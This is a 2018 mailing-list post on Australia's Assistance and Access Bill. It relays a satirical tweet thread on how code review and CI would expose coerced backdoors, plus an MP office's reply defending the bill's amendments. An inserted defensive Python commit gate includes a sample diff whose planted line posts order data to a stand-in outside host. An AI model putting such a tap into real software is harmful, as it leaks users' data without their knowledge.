[LINK] [Fwd: RE: Please stop the Assistance and Access Bill]

Stephen Loosley stephenloosley at outlook.com
Wed Dec 5 16:41:47 AEDT 2018


https://twitter.com/alfiedotwtf/status/1070047303275175936

Alfie John (@alfiedotwtf), 12:08 PM - 4 Dec 2018:

One of the ways #AABill gets access to systems is by commandeering employees of companies to write backdoors. But they’re not even allowed to tell their employer, or face jail time.

I went through the mechanics of this, and realised how out of touch Canberra is...

Alfie John (@alfiedotwtf), 9 hours ago:

Let’s say they coerce a backend dev to write a data tap. A few lines of code here and there, write to a file or connect straight to http://@ASDGovAu/api/vacuum/

Now what? Most devs don’t have access to production! Hilarity ensues...

Alfie John (@alfiedotwtf), 9 hours ago:

The dev is now going to somehow commit this to the repo in order to get it through the pipelines.

First thing is CI/CD will reject the commit because there’s no JIRA ticket for the change.

Ok, let’s slip it under another ticket. Nope! Test harness no longer passes!

Alfie John (@alfiedotwtf), 9 hours ago:

Damn... going to have to write some tests for this tap. Done. Git push.

NOW WAIT FOR THE MERGE REQUEST!

Alfie John (@alfiedotwtf), 9 hours ago:

At least one other person is going to see the code change, and alert your boss that you’re a Russian spy and stealing data.

Now remember, you’re not allowed to tell anyone or face jail time.

So the only way to hide this is if an admin is commandeered as well...

Alfie John (@alfiedotwtf), 9 hours ago:

Nope.

Devops have IDS, so all changes to the system will be seen by everyone in devops. Busted.

So the ONLY way to get a tap in is to put a gun against the head of EVERYONE in devops.

Wait...

Alfie John (@alfiedotwtf), 9 hours ago:

What happens when another dev does a git fetch? They rebase their own code to submit their own changes, do a diff, and now in front of their eyes is the exploit. Busted.

So the ONLY way to get a tap in is to put a gun against the head of EVERYONE in dev.

LOL!

Alfie John (@alfiedotwtf), 9 hours ago:

Let’s picture a small company... Ever tried to keep a secret between 5 devops and 10 devs? How about a bigger company - 30 devs and 10 devops!

Alfie John (@alfiedotwtf), 9 hours ago:

So the only way I see fighting this is by devs and devops quitting their post if ever asked to work on any Notices.

I wonder if there’s anything in the Unfair Dismissal clauses to cover this since your job is no longer tenable 🤔

Alfie John (@alfiedotwtf), 8 hours ago:

Or let’s say we have a Tor-enabled canary system for devs and devops, to leak that a company or themselves have been commandeered... untraceable.

When the canary dies in the coal mine (because Australia loves its coal), IC are going to want to trace the source...

Alfie John (@alfiedotwtf), 8 hours ago:

but they can’t because of how this canary system works. And leaks still happen. What is an #AABill government to do?

The only solution here is to hack the devs and devops they want to commandeer before they’re coopted.

So you’re now being spied on, simply because of your job :(

Alfie John (@alfiedotwtf), 8 hours ago:

Now to time management. When do these taps actually get done? In today’s micromanaged Agile-Scrum-Kanban environment, every minute is tracked, and tracked to JIRA tickets.

Management are now seeing timelines slip because you’re not hitting targets...

Alfie John (@alfiedotwtf), 8 hours ago:

So how are you going to explain slippage? You’re now going to have to commandeer management too!

Now sales are starting to wonder why changes aren’t shipping. They’ve made promises to clients. Easy changes are now taking ages. Devs aren’t speaking, devops are tight lipped...

Alfie John (@alfiedotwtf), 8 hours ago:

and now that management are also on board, they too can’t say a word. So sales start digging. As former devs, they start looking at JIRA and commit messages. They’ve just found the implants.

So sales too are now commandeered!

This secret club is starting to get scope creep 🤦‍♂️🤦‍♂️

Alfie John (@alfiedotwtf), 8 hours ago:

Sorry, what was that... you’re a vendor and your clients require as part of the tender release all source code and they build on their own machines?

Alfie John (@alfiedotwtf), 7 hours ago:

So is #AABill Constitutionally sound?

The Australian Constitution protects property from seizure “on just terms”...

If computers, phones, source code, networks, etc can be seen as “property”, then I can’t believe it might actually come down to The Castle 🤣🤣

==

Cheers,
Stephen

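The thread above leans on two pipeline controls to catch an unsanctioned "data tap": CI rejecting a commit with no ticket reference, and a reviewer seeing the diff. The check below is an added example of such a gate, written for this post; it is not code from the thread or from any real pipeline, and the ticket pattern, allowlisted hosts, egress-call patterns and sample diff are all constructed assumptions.

```python
import re

# Constructed policy values (assumptions, not from any real pipeline).
TICKET_RE = re.compile(r"\b[A-Z][A-Z0-9]+-\d+\b")          # e.g. PAY-123
ALLOWED_HOSTS = {"api.internal.example", "metrics.internal.example"}
URL_RE = re.compile(r"https?://([^/\s\"']+)")
# Calls that open an outbound connection; a new one in a diff is a
# review trigger for a second pair of eyes, not proof of anything.
EGRESS_RE = re.compile(r"\b(requests\.(get|post)|urlopen|socket\.connect)\b")


def check_commit(message, diff):
    """Return a list of policy findings for one commit; an empty list
    means the commit can go to normal review without escalation."""
    findings = []
    if not TICKET_RE.search(message):
        findings.append("no ticket reference in commit message")
    for lineno, line in enumerate(diff.splitlines(), 1):
        # Only lines the commit adds; skip the '+++' file header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        body = line[1:]
        for host in URL_RE.findall(body):
            if host.split(":")[0] not in ALLOWED_HOSTS:
                findings.append(f"line {lineno}: URL to non-allowlisted host {host}")
        if EGRESS_RE.search(body):
            findings.append(f"line {lineno}: new egress call needs second reviewer")
    return findings


# Constructed sample: a tap slipped into an unrelated, ticket-less change.
SAMPLE_MESSAGE = "tidy up logging formatter"
SAMPLE_DIFF = """\
--- a/orders/export.py
+++ b/orders/export.py
@@ -10,3 +10,6 @@ def export(order):
     log.info("exporting %s", order.id)
+    import requests
+    requests.post("https://collector.example.invalid/ingest", json=order.to_dict())
     return render(order)
"""

if __name__ == "__main__":
    for finding in check_commit(SAMPLE_MESSAGE, SAMPLE_DIFF):
        print("BLOCK:", finding)
```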

________________________________
From: Link <link-bounces at mailman.anu.edu.au> on behalf of Karl Auer <kauer at biplane.com.au>
Sent: Wednesday, December 5, 2018 2:21:05 PM
To: Link List; Privacy
Subject: [LINK] [Fwd: RE: Please stop the Assistance and Access Bill]

What's the point? Why do they waste my time and theirs with crap like
this? It's no better than the auto-response I got to the original
email.

Regards, K.

-------- Forwarded Message --------
From: "Noveska, Radmila (M. Kelly, MP)" <Radmila.Noveska at aph.gov.au>
To: 'kauer at biplane.com.au' <kauer at biplane.com.au>
Subject: RE: Please stop the Assistance and Access Bill
Date: Wed, 5 Dec 2018 03:11:08 +0000

Dear Mr Auer

Thank you for your email to Dr Kelly regarding the Telecommunications
and Other Legislation Amendment (Assistance and Access) Bill.

Dr Kelly has acknowledged your email and has asked me to respond on his
behalf.

Labor has spent five years responsibly improving national security
legislation to make Australians safer, and we have done the same thing
this week.

The government have made important concessions on its earlier positions
on the Telecommunications and Other Legislation Amendment (Assistance
and Access) Bill.

It appears the government will agree to proposals by Labor that will
ensure there is better oversight and limitation of the powers in this
bill, and better safeguards against potential unintended consequences.
These are still subject to agreement by the Parliamentary Joint
Committee on Intelligence and Security, and further details will be
contained in its report on the bill.

The changes include limiting the application of the powers in this bill
to only serious offences, properly defining key terms in the bill, and
requiring a “double-lock” authorisation process for Technical
Capability Notices.

Importantly, the PJCIS will continue its scrutiny of the bill into
2019, allowing for outstanding concerns to be worked on and further
amendments considered in the new year if necessary.

Following the extraordinary interference with this committee by the
Minister for Home Affairs and Prime Minister, Labor welcomes the
constructive negotiations conducted with the Attorney-General over the
past two days.

Dr Kelly and Labor are very clear – this bill is far from perfect and
there are likely to be significant outstanding issues. But this
compromise will deliver security and enforcement agencies the powers
they say they need over the Christmas period, and ensure adequate
oversight and safeguards to prevent unintended consequences while
ongoing work continues – just as Labor proposed.

Labor has issued a call to the government – the trashing of bipartisan
process and politicisation of national security that has occurred over
the past month must never happen again. There is nothing more important
than keeping Australians safe – the government must remember that.

Thank you again for writing to Dr Kelly on this important issue and if
there is any federal matter Dr Kelly can assist you with, please do not
hesitate to contact our office.

Kind regards,

Radmila Noveska
Office of The Hon Dr Mike Kelly AM MP
Federal Member for Eden-Monaro
Shadow Assistant Minister for Defence Industry and Support
t: 02 6284 2442


--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer
http://twitter.com/kauer389

GPG fingerprint: A0CD 28F0 10BE FC21 C57C 67C1 19A6 83A4 9B0B 1D75
Old fingerprint: A52E F6B9 708B 51C4 85E6 1634 0571 ADF9 3C1C 6A3A


_______________________________________________
Link mailing list
Link at mailman.anu.edu.au
http://mailman.anu.edu.au/mailman/listinfo/link

